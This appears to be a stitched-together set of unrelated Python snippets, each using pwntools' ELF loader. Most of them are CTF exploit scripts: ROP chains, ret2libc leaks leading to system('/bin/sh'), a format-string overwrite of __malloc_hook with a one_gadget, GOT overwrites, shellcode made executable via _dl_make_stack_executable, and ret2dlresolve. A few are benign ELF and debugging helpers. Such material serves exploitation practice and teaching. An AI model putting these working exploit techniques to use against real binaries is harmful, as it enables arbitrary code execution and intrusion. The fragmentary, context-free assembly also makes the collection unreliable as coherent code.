def change_ld(binary, version, copy=True): if os.path.exists("/home/pu1p/glibcs"): GLIBCS_PATH = "/home/pu1p/glibcs" elif os.path.exists("/var/glibcs"): GLIBCS_PATH = "/var/glibcs" else: print("unknown glibc path") return def _cp_ld_libc(_version): ld_path = "%s/ld_and_libcs_x64/ld_%s.so" % (GLIBCS_PATH, _version) libc_path = "%s/ld_and_libcs_x64/libc_%s.so" % (GLIBCS_PATH, _version) print(ld_path) print(libc_path) if not os.path.exists(ld_path): return "" os.system("cp %s ./" % (ld_path)) os.system("cp %s ./" % (libc_path)) return "ld_%s.so" % (_version) if copy: ld = _cp_ld_libc(version) if ld == "": print("version not exist") return -1 else: ld = version if not os.access(ld, os.R_OK): pwn.log.failure("Invalid path {} to ld".format(ld)) return None if not os.access(binary, os.R_OK): pwn.log.failure("Invalid path {} to binary".format(binary)) return None binary = pwn.ELF(binary) path = './{}_{}'.format(os.path.basename(binary.path), ld.split('.')[-2]) if os.access(path, os.F_OK): os.remove(path) print("remove exist file.....") # return pwn.ELF(path) for segment in binary.segments: # print(segment.header['p_type']) if segment.header['p_type'] == 'PT_INTERP': # print("into this") size = segment.header['p_memsz'] addr = segment.header['p_paddr'] data = segment.data() if size <= len(ld): pwn.log.failure( "Failed to change PT_INTERP from {} to {}".format( data, ld)) return None binary.write(addr, ld.ljust(size, '\x00')) break binary.save(path) os.chmod(path, 0b111000000) #rwx------ pwn.log.info( "PT_INTERP has changed from {} to {}. Using temp file {}".format( data, ld, path)) return pwn.ELF(path)
def __init__(self, binary : str, libc : str = None): if libc == None: libc = DEFAULT_LIBC self.binaryname = binary self.binary_elf = pwn.ELF(binary) self.libc_elf = pwn.ELF(libc) self.project = angr.Project(binary, auto_load_libs=False) self.db = BinaryDb()
def exploit(remote): if remote: pr = pwn.connect(host, port) else: pr = pwn.process(target) try: elf = pwn.ELF('baby_bof') libc = pwn.ELF('libc-2.31.so') rop = pwn.ROP(elf) pop_rdi = pwn.p64(rop.find_gadget(['pop rdi', 'ret']).address) payload = b'A' * 18 payload += pop_rdi payload += pwn.p64(elf.got['puts']) payload += pwn.p64(elf.plt['puts']) payload += pwn.p64(elf.sym['vuln']) pr.sendlineafter("me\n", payload) print(pr.readline()) out = pr.readline().strip() puts_addr = int.from_bytes(out[:8], 'little') print('puts @', hex(puts_addr)) """Also works if remote: sys = puts_addr - 0x32190 bin_sh = puts_addr + 0x13000a else: sys = puts_addr - 0x2e660 bin_sh = puts_addr + 0x116eb6 """ libc.address = puts_addr - libc.symbols['puts'] sys = libc.symbols['system'] bin_sh = next(libc.search(b'/bin/sh')) print('sys @', hex(sys)) print('bin_sh @', hex(bin_sh)) ret = pwn.p64(rop.find_gadget(['ret']).address) payload = b'A' * 18 payload += ret payload += pop_rdi payload += pwn.p64(bin_sh) payload += pwn.p64(sys) payload += pwn.p64(elf.sym['vuln']) print(payload) pr.sendafter('me\n', payload) pr.sendline() pr.sendline('cat flag.txt') print(pr.readall(4)) except Exception as e: print(e) finally: pr.close()
def __init__(self, local=True, debugger=True): pwn.context.update({'os': 'linux', 'arch': 'amd64'}) self.elf = pwn.ELF('./main2_success') self.libc = pwn.ELF('./libc.so.6') if local: _env = {'LD_PRELOAD': './libc.so.6'} self.t = pwn.process(self.elf.path, env=_env) else: self.t = pwn.remote("bin.q21.ctfsecurinets.com", 1340) if debugger and local: gdb_cmd = ["b *addr", "c"] pwn.gdb.attach(self.t, gdbscript="\n".join(gdb_cmd))
def attack(): pr = pwn.process([remote_binary], cwd=os.path.dirname(remote_binary)) try: elf = pwn.ELF(remote_binary, False) payload = pwn.p32(elf.got["exit"] - 12) pr.readline() fullname = int(pr.readline()) # fullname shellcode = pwn.asm( "jmp skip;" + "nop;" * 100 + "{} skip: nop;".format(pwn.shellcraft.i386.linux.sh())).ljust(672 - 4) shellcode += pwn.p32(73).ljust(72) shellcode += pwn.p32(0x101) print(pwn.hexdump(shellcode)) print("shellcode length:", len(shellcode)) pr.writelineafter("Input fullname\n", shellcode) # lastname payload = pwn.p32(0x101) # set size to 0 payload += pwn.p32(elf.got["exit"] - 12) + pwn.p32(fullname + 8) payload = payload.ljust(256 - 4) payload = "A" * (256 - 4) + payload + pwn.p32(0x101) # set size to 0 print(pwn.hexdump(payload)) print("payload length:", len(payload)) pr.writelineafter("Input lastname\n", payload) pr.interactive() finally: pr.close()
def __init__(self, elf_filename): """ :param elf_filename: The ELF filename :type elf_filename: str """ super(AsmElfFile, self).__init__(elf_filename) self._file = pwn.ELF(elf_filename)
def attack(): try: pr = pwn.process(remote_binary) elf = pwn.ELF(remote_binary, False) pr.sendlineafter("Input the name of a student\n", "A") pr.sendlineafter( "Input the name of the favorite professor of a student \n", "B") pr.sendlineafter( "Input the name of the student that will give the score \n", "A") pr.sendlineafter( "Input the name of the professor that will be scored \n", "B") pr.sendlineafter("Input the score: \n", str(elf.sym["win"])) pr.sendlineafter("Input the name of a student\n", "B") pr.sendlineafter( "Input the name of the favorite professor of a student \n", "C") pr.sendlineafter( "Input the name of the student that will give the score \n", "B") pr.sendlineafter( "Input the name of the professor that will be scored \n", "C") pr.sendlineafter("Input the score: \n", str(1)) rsp = pr.readall(timeout=0.5) print(rsp) finally: pr.close()
def exploit(remote): if remote: pr = pwn.connect(host, port) else: pr = pwn.process(target) try: elf = pwn.ELF(target) rop = pwn.ROP(elf) pop_rdi = pwn.p64(rop.find_gadget(['pop rdi', 'ret']).address) pop_rsi = pwn.p64( rop.find_gadget(['pop rsi', 'pop r15', 'ret']).address) print(pop_rdi) print(pop_rsi) payload = b"A" * 72 payload += pop_rdi payload += pwn.p64(0xdeadbeef) payload += pop_rsi payload += pwn.p64(0x1337c0de) payload += pwn.p64(0x1337c0de) payload += pwn.p64(elf.sym['win']) print(payload, len(payload)) pr.sendafter("joke\n", payload) pr.sendline() pr.sendline("cat flag.txt") print(pr.readall(2)) except Exception as e: print(e) finally: pr.close()
def setupPtraceProcess(self) -> PtraceProcess: from ptrace.debugger.debugger import PtraceDebugger assert isinstance(self.debugger, PtraceDebugger) ptrace_proc = self.debugger.addProcess(self.popen_obj.pid, is_attached=False, seize=True) ptrace_proc.interrupt( ) # seize does not automatically interrupt the process ptrace_proc.setoptions(self.debugger.options) # as soon as this variable is changed, process will launch. Here you can alter the process' personality # warning: right now you can only SET flags, you CANNOT UNSET them. This feature can easily be added in launcher launcher_ELF = pwn.ELF(path_launcher, False) # get ready to launch ad = launcher_ELF.symbols["add_personality"] add_personality = 0 if self.disable_randomization: add_personality += 0x40000 add_personality = pack("<I", add_personality) ptrace_proc.writeBytes(ad, add_personality) ptrace_proc.cont() event = ptrace_proc.waitEvent() assert isinstance(event, ProcessExecution), str( event) # execve syscall is hit ptrace_proc.syscall() ptrace_proc.waitSyscall() return ptrace_proc
def solve(io): for i in range(4): io.recvline() while True: s = io.recvlineS().strip() s = s[: s.rfind("'") + 1] s = eval(s) open("chall", "wb").write(s) st = os.stat("chall") os.chmod("chall", st.st_mode | stat.S_IEXEC) pwn.context.binary = elf = pwn.ELF("chall") offset = get_rip_offset("chall") payload = get_ret2dlresolve(elf, offset) io.sendline(payload) io.sendline("cat flag.txt") out = io.recvuntil("}") start, end = out.rfind(b"bctf{"), out.rfind(b"}") flag = out[start : end + 1] print(f"[+] Flag: {flag}") io.sendline("exit") io.sendlineafter("flag>", flag)
def create_payload(): payload = b'' elf = pwn.ELF(remote_binary, False) #payload += pwn.p32(0x8048430) # gets@plt payload += pwn.p32(elf.sym['gets']) # gets@plt payload += pwn.p32(elf.sym['display_flag']) payload += pwn.p32(elf.sym['win1']) return payload
def exploit(remote): pwn.context.clear(bits=64) if remote: pr = pwn.connect(host, port) else: pr = pwn.process(target, env={'LD_PRELOAD': 'libc-2.27.so'}) try: elf = pwn.ELF(target, False) libc = pwn.ELF('./libc-2.27.so', False) # one_gadget libc-2.27.so from libc6_2.27-3ubuntu1.4_amd64.deb gadgets = [0x4f3d5, 0x4f432, 0x10a41c] payload = "%{}$p".format(23) pr.sendlineafter("point\n", payload) pr.readline() # 0x00007fffffffda08│+0x0088: 0x00007ffff7dfb082 → <__libc_start_main+231> mov edi, eax libc_start_main_addr = int(pr.readline().strip().decode(), 16) - 231 libc.sym['gadget'] = gadgets[2] libc.address = libc_start_main_addr - libc.sym['__libc_start_main'] print('libc @', hex(libc.address)) print('gadget @', hex(libc.sym['gadget'])) print('__libc_start_main @', hex(libc_start_main_addr)) print('__malloc_hook @', hex(libc.sym['__malloc_hook'])) stack_offset = 6 payload = pwn.fmtstr_payload( stack_offset, {libc.sym["__malloc_hook"]: libc.sym['gadget']}, write_size='short') print(payload, len(payload)) pr.sendafter("point\n", payload) pr.sendline() payload = b"%65537$c" pr.sendafter("point\n", payload) pr.sendline() pr.readline() pr.sendline('cat flag.txt') print(pr.readall(2)) except Exception as e: print(e) finally: pr.close()
def exploit(remote=False): if remote: pr = pwn.connect(host, port) else: pr = pwn.process(target) try: elf = pwn.ELF(target) rop = pwn.ROP(elf) print(pr.readline()) """ Find padding via gdb gef➤ info frame Stack level 0, frame at 0x7fffffffda48: rip = 0x401153 in vuln; saved rip = 0x6161616161616164 called by frame at 0x7fffffffda58 Arglist at 0x6161616161616163, args: Locals at 0x6161616161616163, Previous frame's sp is 0x7fffffffda50 Saved registers: rip at 0x7fffffffda48 gef➤ pattern search 0x6161616161616164 [+] Searching '0x6161616161616164' [+] Found at offset 24 (little-endian search) likely [+] Found at offset 17 (big-endian search) """ payload = b'a' * 24 # gadgets from output of 'ROPgadget --binary weird-rop-f17e9f493733a383aac548dbf1320c33' pop_rdx = pwn.p64(0x4010de) mov_rax_0 = pwn.p64(0x401002) mov_rax_1 = pwn.p64(0x40100a) mov_rdi_1 = pwn.p64(0x401012) xor_rdi_0x53 = pwn.p64(0x40107d) xor_rdi_0x56 = pwn.p64(0x40101b) xor_rdi_0x198 = pwn.p64(0x4010c3) xor_rdi_0x19b = pwn.p64(0x40104c) if remote: payload += xor_rdi_0x56 payload += xor_rdi_0x53 else: payload += xor_rdi_0x19b payload += xor_rdi_0x198 payload += pop_rdx payload += pwn.p64(0x19) # read length payload += mov_rax_0 payload += pwn.p64(rop.find_gadget(['syscall'])[0]) payload += mov_rax_1 payload += mov_rdi_1 payload += pwn.p64(rop.find_gadget(['syscall'])[0]) pr.sendline(payload) print(pr.readall(2)) finally: pr.close()
def __init__(self, local=True, binary='', ip='', port=0): self.elf = pwn.ELF(binary) self.libc = self.elf.libc self.rop_libc = pwn.ROP(self.libc) self.rop_elf = pwn.ROP(self.elf) if local: self.proc = pwn.process(binary) else: self.proc = pwn.remote(ip, port)
def find_symbol(pr, canary, num): elf = pwn.ELF(target, False) payload = b'A' * 512 + pwn.p32(canary) + b'B' * 12 payload += pwn.p32(elf.plt['puts']) payload += pwn.p32(elf.sym['win']) payload += pwn.p32(elf.got['puts']) pr.sendlineafter("What number would you like to guess?\n", str(num)) pr.sendlineafter("New winner!\nName? ", payload) pr.readline() pr.readline() return pwn.u32(pr.readline()[:4])
def detect_segfault(canary): ofs = 16 while True: #payload = pwn.fit({ofs: pwn.p16(pwn.ELF(remote_binary, False).sym["display_flag"])}, filler='B') payload = b"A" * ofs + pwn.p16( pwn.ELF(remote_binary, False).sym["display_flag"]) rsp = send_payload(canary, payload) if "pico" in rsp.lower(): print(rsp) break
def segfault(): try: pr = pwn.process(remote_binary) elf = pwn.ELF(remote_binary, False) print(elf.got) pr.sendlineafter("Input address\n", str(elf.got["exit"])) pr.sendlineafter("Input value?\n", str(elf.sym["win"])) rsp = pr.readall(timeout=0.5) print(rsp) finally: pr.close()
def exploit(): pr = pwn.connect(host, port) elf = pwn.ELF(target) rop = pwn.ROP(elf) payload = b"A" * 32 rop.set_lock() rop.shell() payload += rop.chain() print('len:', len(payload), payload) pr.sendlineafter("What would a hero say ?\n>>> ", payload) print(pr.readall(2))
def main() -> None: """Does general setup and calls exploit.""" if len(sys.argv) < 2: print(f"Usage: {sys.argv[0]} <mode>") sys.exit(0) env = os.environ.copy() try: pwn.context.binary = pwn.ELF(BINARY) except IOError: print(f"Failed to load binary ({BINARY})") mode = sys.argv[1] env["TERM"] = "ansi77" env["COLUMNS"] = "40" env["ROWS"] = "20" if mode == "local": proc = pwn.process(BINARY, env=env) elif mode == "debug": proc = pwn.process(BINARY, env=env) gdb_cmd = [ "tmux", "split-window", "-p", "75", "gdb", BINARY, str(proc.pid), ] for cmd in GDB_COMMANDS: gdb_cmd.append("-ex") gdb_cmd.append(cmd) gdb_cmd.append(BINARY) subprocess.Popen(gdb_cmd) elif mode == "local_hosted": proc = pwn.remote("localhost", PORT) elif mode == "remote": proc = pwn.remote(HOST, PORT) else: print("Invalid mode") sys.exit(1) exploit(proc, mode)
def __init__(self, filename): self.filename = pathlib.Path(filename) self.elf = pwn.ELF(filename) self._disassembled_cache = {} self._loc_to_symbol = {} # Find the locations of relaxant functions in the file for symbol_name, symbol_loc in self.elf.symbols.items(): if symbol_name.startswith(("got.", "plt.")): continue symbol_loc = hex(symbol_loc) logger.debug("Found symbol for %s at %s", symbol_name, symbol_loc) self._loc_to_symbol[symbol_loc] = symbol_name
def attack(): elf = pwn.ELF(remote_binary) for i in range(-512, 0, 1): pr = pwn.process(remote_binary, cwd=os.path.dirname(remote_binary)) try: pr.writelineafter("Input the integer value you want to put in the array\n", str(elf.sym["win"])) pr.writelineafter("Input the index in which you want to put the value\n", str(i)) rsp = pr.readall(timeout=0.5) if "pico" in rsp: print(rsp) break finally: pr.close()
def template(filename, host="", port=0): tp = "" with open("/mnt/hgfs/codes/pwn/pwn_framework/template.py", "r") as f1: tp = f1.read() if "/" in filename: filename = filename.split("/")[-1] tp = tp.replace("ARCH", pwn.ELF(filename).arch) tp = tp.replace("FILENAME", filename) tp = tp.replace("HOST", host) tp = tp.replace("PORT", str(port)) with open("exp.py", "w") as f2: f2.write(tp)
def exploit(remote): if remote: pr = pwn.connect(host, port) else: pr = pwn.process(target) try: elf = pwn.ELF(target) rop = pwn.ROP(elf) main_addr = pr.readline().strip().decode() main_addr = int(main_addr[main_addr.find('street ') + 7:], 16) print('main @', hex(main_addr)) ca_addr = main_addr + (elf.sym['california'] - elf.sym['main']) si_addr = main_addr + (elf.sym['silicon_valley'] - elf.sym['main']) loss_addr = main_addr + (elf.sym['loss'] - elf.sym['main']) print('ca @', hex(ca_addr)) print('si @', hex(si_addr)) print('loss @', hex(loss_addr)) """ california() => win_land='/bin' silicon_valley() => win_land='/bin/sh' loss(0x1337c0de, 0xdeadc0de-0x1337c0de) """ pop_rdi = pwn.p64(main_addr + (rop.find_gadget(['pop rdi', 'ret']).address - elf.sym['main'])) pop_rsi = pwn.p64(main_addr + ( rop.find_gadget(['pop rsi', 'pop r15', 'ret']).address - elf.sym['main'])) payload = b'A' * 40 payload += pwn.p64(ca_addr) payload += pwn.p64(si_addr) payload += pop_rdi + pwn.p64(0x1337c0de) payload += pop_rsi + pwn.p64(0xcb760000) + pwn.p64(0xcb760000) payload += pwn.p64(loss_addr) print(len(payload), payload) pr.sendafter('often?\n', payload) pr.sendline() pr.sendline('cat flag.txt') print(pr.readall(4)) except Exception as e: print(e) finally: pr.close()
def attack(remote): pr = None if remote: pr = pwn.remote(host, port) else: pr = pwn.process(target) try: libc = CDLL('libc.so.6') num = (libc.rand() % 100) + 1 pr.sendlineafter("What number would you like to guess?\n", str(num)) elf = pwn.ELF(target, False) rop = pwn.ROP(elf) payload = b'A' * 120 payload += pwn.p64(rop.find_gadget(['pop rdx', 'ret']).address) payload += pwn.p64(elf.sym['__stack_prot']) payload += pwn.p64(rop.find_gadget(['pop rax', 'ret']).address) payload += pwn.p64(7) # PROT_READ|PROT_WRITE|PROT_EXEC payload += pwn.p64( 0x0000000000419127 ) # can't find this gadget in pwn, using result from ``ROPgadget --binary ./vuln`` # 0x0000000000419127 : mov qword ptr [rdx], rax ; ret payload += pwn.p64(rop.find_gadget(['pop rdi', 'ret']).address) payload += pwn.p64(elf.sym['__libc_stack_end']) payload += pwn.p64(elf.sym['_dl_make_stack_executable']) payload += pwn.p64( 0x0000000000451974 ) # can't find this gadget in pwn, using result from ``ROPgadget --binary ./vuln`` # 0x0000000000451974 : push rsp ; ret # http://shell-storm.org/shellcode/files/shellcode-603.php shellcode = b"\x48\x31\xd2\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xeb\x08\x53\x48\x89\xe7\x50\x57\x48\x89\xe6\xb0\x3b\x0f\x05" payload += shellcode print('payload:', payload, 'len:', len(payload)) pr.send(payload) pr.readuntil("New winner!\nName? ") pr.sendline() print(pr.readline()) #pr.interactive() pr.sendline("cat flag.txt;") print('flag:', pr.readall(timeout=2).decode()) except Exception as e: print(e) finally: pr.close()
def exploit(remote): if remote: pr = pwn.connect(host, port) else: pr = pwn.process(target) try: elf = pwn.ELF(target) print('win_game @', hex(elf.sym['win_game'])) pr.sendlineafter('BOF it to start!\n', 'BOF') payload = b'A' * 56 payload += pwn.p64(elf.sym['win_game']) shouted = False print(payload) while True: cmd = pr.readline() print(cmd) if b"Twist" in cmd: if shouted: pr.send(payload) pr.sendline() print(pr.readall(2)) else: pr.sendline('T') elif b"Pull" in cmd: if shouted: pr.send(payload) pr.sendline() print(pr.readall(2)) else: pr.sendline('P') elif b"BOF" in cmd: if shouted: pr.send(payload) pr.sendline() print(pr.readall(2)) else: pr.sendline('B') elif b"Shout" in cmd: pr.send(payload) pr.sendline() shouted = True finally: pr.close()
def exploit(): conn = pwn.ssh(user, host, port, pw) pr = conn.process(target) try: elf = pwn.ELF(target, False) payload = b'A' * 52 payload += pwn.p32(elf.sym["main"] + 155) pr.sendlineafter("Enter your favorite color: ", payload) pr.sendline("cat flag.txt") print(pr.readall(2).decode()) except Exception as ex: print(ex) finally: pr.close()
def attack(): pr = pwn.process([remote_binary, 'A'], cwd=os.path.dirname(remote_binary)) try: elf = pwn.ELF(remote_binary, False) payload = pwn.p32(elf.got["exit"] - 12) pr.readline() first = int(pr.readline()) print("first:", first) payload += pwn.p32(first + 8) payload += pwn.asm("push {};ret;".format(elf.sym["win"])) pr.writeline("A") pr.writelineafter("an overflow will not be very useful...\n", payload) rsp = pr.readall(timeout=0.5) print(rsp) finally: pr.close()
def get_shell(pr, canary, sys_addr, binsh_addr): elf = pwn.ELF(target, False) payload = b'A' * 512 + pwn.p32(canary) + b'B' * 12 payload += pwn.p32(sys_addr) payload += pwn.p32(elf.sym['win']) payload += pwn.p32(binsh_addr) """the rop way rop = pwn.ROP(elf) rop.call(sys_addr, [binsh_addr]) payload += rop.chain() """ print('payload:', payload) pr.sendafter("New winner!\nName? ", payload) pr.sendline() print(pr.readline()) print(pr.readline()) pr.sendline("cat flag.txt;") print('flag:', pr.readall(timeout=2).decode())
def detect_segfault(): """ Input result of `pwn.cyclic(128,n=8)`, we got a segfault. By checking the stack, we have (gdb) info stack #0 0x00000000004008cd in vuln () #1 0x616161616161616a in ?? () #2 0x616161616161616b in ?? () #3 0x616161616161616c in ?? () #4 0x616161616161616d in ?? () #5 0x616161616161616e in ?? () #6 0x616161616161616f in ?? () #7 0x6161616161616170 in ?? () #8 0x0000000000000000 in ?? () """ ofs = pwn.cyclic_find(pwn.p64(0x616161616161616a), n=8) # 72 """ A trick due to old code haven't been removed payload = b'A'*ofs + pwn.p64(pwn.ELF(remote_binary, False).sym["main"]) pr.writelineafter("Welcome to 64-bit. Can you match these numbers?\n", payload); payload = b'A'*ofs + pwn.p64(pwn.ELF(remote_binary, False).sym["flag"]) pr.writelineafter("Welcome to 64-bit. Can you match these numbers?\n", payload); """ for _ in range(0): payload = b'A' * ofs + pwn.p64( pwn.ELF(remote_binary, False).sym["main"]) pr.writelineafter("Welcome to 64-bit. Can you match these numbers?\n", payload) """ According to the conditions we need to make `win1` and `win2` true by calling `win_fn1` and `win_fn2` before `win_fn` """ payload = b"A" * ofs + build_rop() print("payload:\n", payload) pr.writelineafter("Welcome to 64-bit. Can you match these numbers?\n", payload) rsp = pr.readall(timeout=0.5) print('ofs:', ofs) print('rsp:', rsp) if rsp and "pico" in rsp.decode().lower(): print(rsp)
def _getElf(self, lib: str): """ given a library name, load it as an pwn.ELF object and determine the baseAdress. Makes sure there are not multiple librarys with the name """ if lib in self.elfDict: return self.elfDict[lib] else: maps = getMappings(self.pid, lib) if len(maps) == 0: raise ValueError("lib not found") # make sure there arent multiple libarys with the given infix sortfunc = lambda mapping: mapping.pathname maps = sorted(maps, key=sortfunc) # groupby requires sorted list maps_group_pathname = [] for _, g in groupby(maps, sortfunc): maps_group_pathname.append(list(g)) if len(maps_group_pathname) != 1: assert len(maps_group_pathname) > 0 raise ValueError("multiple libs with what name") # create ELF full_path = maps_group_pathname[0][0].pathname if full_path in self.elfDict: return self.elfDict[full_path] elf = pwn.ELF(full_path, False) self.elfDict[lib] = elf self.elfDict[full_path] = elf # find base adress keyfunc = lambda mapping: mapping.start baseAd = min(maps_group_pathname[0], key=keyfunc).start if not elf.pie: baseAd = 0 self.baseDict[lib] = baseAd elf.base = baseAd return elf